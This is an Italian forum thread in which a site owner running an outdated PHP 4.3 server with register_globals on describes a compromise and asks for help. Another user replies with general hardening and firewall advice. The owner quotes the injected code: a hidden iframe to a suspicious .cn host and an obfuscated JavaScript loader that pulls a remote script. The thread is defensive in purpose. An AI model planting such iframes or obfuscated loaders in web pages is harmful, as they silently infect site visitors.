Attacco server WK2

[gervaweb]

GoodWeb

Da alcuni giorni subisco dei tentativi (meglio ci sono riusciti) di accesso e modifica dei file principali di alcuni siti.
In particolare chi attacca scrive / aggiunge alcune righe di codice sotto allegate:

Codice PHP:

<iframe src='http://tixwagoq.cn/in.cgi?14' frameborder='0' height='1' width='1'></iframe> 


Codice PHP:

<html><script> /*@cc_on @*/ /*@if (@_win32) var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = "";  for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);  document.write(result); /*@end @*/ </script></html> 


Ho arginato il problema andando a verifica periodicamente eventuali modifiche e nel caso ripristinare i file modificati. Ma certamente non posso continuare così per tutta la vita ;-)

Il sistema è così configurato:
- Windows 2000 server
- PHP 4.3 (global=ON)
- MySQL

Ora mi rendo conto che PHP sia "vecchio" e in particolar modo l'aver settato global=ON sia presumibilmente una potenziale causa, ma allo stesso tempo oggi non posso cambiare nulla, causa diverse installazioni non aggiornate a PHP5.
In caso contrario subire maggiori danni economici per il fermo macchina.
E' sottinteso che cmq sto lavorando per le modifiche e l'upgrade, ma credo che questo richieda ancora almeno 2/3 mesi.

Vorrei capire alcune cose (in modo semplice se possibile):
- come fanno a trasmettere e fare eventuali "append" ai file htm, php, etc.
- come o dove posso controllare da dove entrano
- come posso risolvere il problema global=on in altra maniera mantenendo il tutto possibilmente compatibile con le mie applicazioni
- è possibile che un simile attacco posso comportare problemi più gravi come es. cancellazione file, modifica db o altro, o l'accesso è limitato alla sola modifica dei file

Da quanto ho capito i "cattivi" non hanno una password amministrativa, ma sfruttano una "falla" in qualche script e in qualche modo dal browser fanno i "comodi loro".

Aggiungo che il server ha circa 8anni di attività nella stessa configurazione indicata, le applicazioni hanno circa 6/7 anni e mai hanno subito problemi.

Grazie a tutti per eventuali risposte, suggerimenti e consigli.

[mardux]

bhè come hai detto tu è molto probabile che l'attacco avvenga sfruttando qualche falla relativa al php obsoleto.

ma siccome attualmente non puoi toccarlo, dovresti trovare un'altro modo.

partendo dall'hardening di windows, del DB e del webserver che usi, potresti poi fare del packet filter tramite un FW (a proposito ne hai uno?), bloccando gli ip sorgenti (se sono sempre gli stessi o partono se dalla stessa rete) che puoi individuare dai log del webserver, oppure ricorrendo ad un IPS/IDS.

ci sono alemno 3 livelli di sicurezza da prendere in considerazione, e sono:

1-sicurezza livello rete (FW, IPS, ecc..)
2-sicurazza del sistema e dei servizi (SO e servizi server (web, db, ecc))
3-sicurezza applicativa (controllo degli input, programmazione sicura, hardening PHP e script che usi)

siccome non puoi toccare il livello 3 lavora almeno su 1 e 2

[gervaweb]

In primo luogo grazie 1000 per l'interesse e la risposta.

Logicamente il server è filtrato da un FW basato su Linux.
Come da te suggerito, provvederò a verificare al meglio hardening del sistema e controllare i diversi file di log per rintracciare eventuali indizi. Cosa che peraltro sto già facendo.

Credo cmq di aver individuato il problema nel solo PHP, considerando il fatto che dietro il FW ci sono altri tre server (due windows e uno linux).
Quelli windows non fanno uso di PHP e quello Linux ha una versione recente di PHP e gli stessi non denunciano problemi !!!

Non mi rimane altro che accelerare l'upgrade delle applicazioni verso la nuova versione di PHP credo.

Nel frattempo sto spostando alcuni siti su altro server con diverso IP e infrastruttura così da suddividere il potenziale rischio.....

Grazie ancora